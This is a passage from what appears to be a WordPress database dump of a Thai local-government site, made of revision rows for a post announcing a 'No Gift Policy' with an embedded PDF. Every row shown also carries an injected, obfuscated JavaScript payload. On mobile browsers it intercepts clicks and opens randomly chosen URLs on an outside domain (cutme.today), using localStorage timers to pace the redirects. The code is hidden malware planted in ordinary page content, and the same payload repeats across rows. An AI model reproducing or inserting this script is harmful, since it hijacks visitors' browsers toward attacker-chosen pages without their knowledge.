|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:24:03','2025-06-09 06:24:03','',859,'http://pakhaeng.ssk.in.th/?p=1294',0,'revision','',0),
(1295,1,'2025-06-09 13:24:22','2025-06-09 06:24:22','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:24:22','2025-06-09 06:24:22','',859,'http://pakhaeng.ssk.in.th/?p=1295',0,'revision','',0),
(1296,1,'2025-06-09 13:24:49','2025-06-09 06:24:49','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy 